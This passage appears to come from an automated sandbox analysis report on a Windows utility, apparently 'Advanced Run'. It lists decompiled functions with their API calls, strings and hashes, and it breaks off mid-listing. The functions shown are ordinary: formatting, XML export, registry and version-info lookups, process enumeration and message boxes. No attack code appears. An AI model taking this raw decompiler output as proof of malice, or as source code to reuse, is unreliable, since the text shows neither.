Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

0x00404fe0
0x00404fe9
0x00405000
0x00405005
0x00405009
0x0040500c
0x0040500e
0x00405015
0x00405016
0x00405021
0x00405026
0x00405027
0x0040502c
0x00405031
0x00405039
0x0040503f
0x00405044
0x00405048
0x0040504e
0x00405056
0x0040505c
0x0040504e
0x00405065
0x0040506a
0x00405072
0x00405079

APIs

memset.MSVCRT ref: 00405000
_snwprintf.MSVCRT ref: 00405027
wcscat.MSVCRT ref: 00405039
wcscat.MSVCRT ref: 00405056
wcscat.MSVCRT ref: 00405065

Strings

%2.2X, xrefs: 00405016

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC

Uniqueness

Uniqueness Score: -1.00%

Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}

0x00407d9c
0x00407d9e
0x00407da5
0x00407db3
0x00407dba
0x00407dc5
0x00407dc7
0x00407dd0
0x00407dc9
0x00407dc9
0x00407dc9
0x00407dd8
0x00407de1
0x00407de5
0x00407deb
0x00407df2
0x00407df3
0x00407dfe
0x00407e03
0x00407e04
0x00407e21

APIs

memset.MSVCRT ref: 00407DA5
memset.MSVCRT ref: 00407DBA
_snwprintf.MSVCRT ref: 00407E04

Strings

<?xml version="1.0" ?>, xrefs: 00407DC9
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
<%s>, xrefs: 00407DF3

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}

0x00403b56
0x00403b5d
0x00403b6f
0x00403b76
0x00403b82
0x00403b8d
0x00403b8e
0x00403b99
0x00403b9e
0x00403b9f
0x00403ba7
0x00403bb9
0x00403bce
0x00403be5
0x00403bef
0x00403bf8
0x00403c00

APIs

memset.MSVCRT ref: 00403B5D
memset.MSVCRT ref: 00403B76

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

Advanced Run, xrefs: 00403BBE
"%s" /EXEFilename "%%1", xrefs: 00403B8E
exefile, xrefs: 00403BAD

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
API String ID: 1832587304-479876776
Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}

0x0040afd3
0x0040afe2
0x0040aff3
0x0040b002
0x0040b023
0x00000000
0x0040b047
0x0040b02e
0x0040b034
0x0040b03c
0x00000000

APIs

wcscpy.MSVCRT ref: 0040AFD3
wcscat.MSVCRT ref: 0040AFE2
wcscat.MSVCRT ref: 0040AFF3
wcscat.MSVCRT ref: 0040B002
VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE

Strings

\StringFileInfo\, xrefs: 0040AFCD

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00405EB2
wcscpy.MSVCRT ref: 00405ED5

Strings

dialog_%d, xrefs: 00405EA6
strings, xrefs: 00405EC0
general, xrefs: 00405ECB
menu_%d, xrefs: 00405E96

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF

Uniqueness

Uniqueness Score: -1.00%

Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}

0x004092f3
0x004092fb
0x00409303
0x00409305
0x00409310
0x00409433
0x00409433
0x00409439
0x0040943f
0x00409445
0x0040944b
0x0040944e
0x00409452
0x00409466
0x0040946e
0x00409475
0x004094f7
0x004094f7
0x004094f9
0x00000000
0x00000000
0x00409488
0x00409494
0x004094a5
0x004094a9
0x004094b5
0x004094c3
0x004094c6
0x004094d5
0x004094dc
0x004094e1
0x004094e3
0x004094f1
0x00000000
0x004094f1
0x00000000
0x004094e3
0x00000000
0x004094f7
0x00409452
0x00409316
0x00409316
0x0040931c
0x00000000
0x00409322
0x0040932b
0x00409333
0x00409337
0x00409341
0x00409342
0x0040934e
0x0040934f
0x00409358
0x0040935e
0x0040935e
0x00409363
0x0040936b
0x0040936d
0x00409377
0x00409385
0x0040938d
0x0040939d
0x004093a5
0x004093ac
0x004093b4
0x004093c5
0x004093c9
0x004093da
0x004093df
0x004093e5
0x004093e6
0x004093ea
0x004093f6
0x004093fc
0x00409407
0x00409407
0x0040941d
0x00000000
0x00000000
0x00409423
0x00409428
0x00409375
0x00409375
0x00000000
0x00000000
0x0040942e
0x00000000
0x00409428
0x00409377
0x0040936d
0x004094fb
0x004094ff
0x004094ff
0x00409337
0x0040931c
0x0040950f

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
memset.MSVCRT ref: 0040938D
memset.MSVCRT ref: 0040939D

Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233

memset.MSVCRT ref: 00409488
wcscpy.MSVCRT ref: 004094A9
CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}

0x00402ed7
0x00402eee
0x00402ef8
0x00402f00
0x00402f01
0x00402f05
0x00402f0a
0x00402f1a
0x00402f30

APIs

GetClientRect.USER32 ref: 00402ED7
GetSystemMetrics.USER32 ref: 00402EE5
GetSystemMetrics.USER32 ref: 00402EF1
BeginPaint.USER32(?,?), ref: 00402F0B
DrawFrameControl.USER32 ref: 00402F1A
EndPaint.USER32(?,?), ref: 00402F27

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}

0x004079a4
0x004079b8
0x004079bd
0x004079c2
0x004079c5
0x004079c5
0x004079db
0x004079f7
0x00407a06
0x00407a0c
0x00407a11
0x00407a13
0x00407a14
0x00407a17
0x00407a18
0x00407a1d
0x00407a22
0x00407a25
0x00407a2a
0x00407a35
0x00407a3a
0x00407a3b
0x00407a40
0x00407a52

APIs

memset.MSVCRT ref: 004079DB

Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407A25

Strings

</item>, xrefs: 00407A41
<item>, xrefs: 004079AE
<%s>%s</%s>, xrefs: 00407A18

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}

0x00404683
0x00404692
0x00404699
0x0040469b
0x004046af
0x004046ba
0x004046bc
0x004046c7
0x004046cc
0x004046cd
0x004046ee
0x004046f3
0x004046fa
0x004046fa
0x004046ee
0x00404705

APIs

memset.MSVCRT ref: 004046AF
_snwprintf.MSVCRT ref: 004046CD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

%s\shell\%s, xrefs: 004046BC

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen_snwprintfmemset
String ID: %s\shell\%s
API String ID: 1458959524-3196117466
Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}

0x00409d5f
0x00409d67
0x00409d70
0x00409ddb
0x00409d72
0x00409d74
0x00409db2
0x00409d84
0x00409d84
0x00409d8c
0x00409d8d
0x00409d98
0x00409d9d
0x00409d9e
0x00409da6
0x00409daf
0x00409daf
0x00409dc3
0x00409dc3

APIs

wcschr.MSVCRT ref: 00409D79
_snwprintf.MSVCRT ref: 00409D9E
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
GetPrivateProfileStringW.KERNEL32 ref: 00409DD4

Strings

"%s", xrefs: 00409D8D

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
windowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}

0x004047d2
0x004047da
0x004047e0
0x004047e4
0x004047ec
0x004047ec
0x004047f5
0x00404800
